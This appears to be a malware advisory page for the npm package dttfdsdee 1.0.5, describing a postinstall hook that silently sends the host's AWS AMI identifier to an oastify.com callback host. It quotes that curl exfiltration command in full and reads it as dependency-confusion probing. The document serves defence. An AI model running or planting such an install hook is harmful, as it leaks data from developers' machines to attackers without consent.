dttfdsdee @1.0.5
Vulnerability report · Last retrieved from osv.dev June 26, 2026 at 2:48 PM UTC
OSV ID
MAL-2026-6498
Ecosystem
npm
Summary
package.json declares a postinstall lifecycle script that runs on every npm install: curl -X POST -d "$(cat /data/ami-id)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data . This reads the AWS EC2 AMI identifier from the installer's host and POSTs it over plain HTTP to an attacker-controlled oastify.com subdomain (Burp Collaborator out-of-band callback host). Auto-executes without user consent and is unrelated to any documented package purpose; the internal name claims to be easy-string-kit , while author, repository, and homepage metadata fields are empty and a keyword contains an embedded shell fragment ( trunls -lae ). The shape — throwaway name, missing maintainer metadata, OAST exfil of a host identifier on install — is consistent with reconnaissance / dependency-confusion probing of internal build environments.
Source: amazon-inspector (7f61e9b10455dc3781fcee5dfb2654ff824c2ac2e51dfaf7ebfba342f570f66c)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.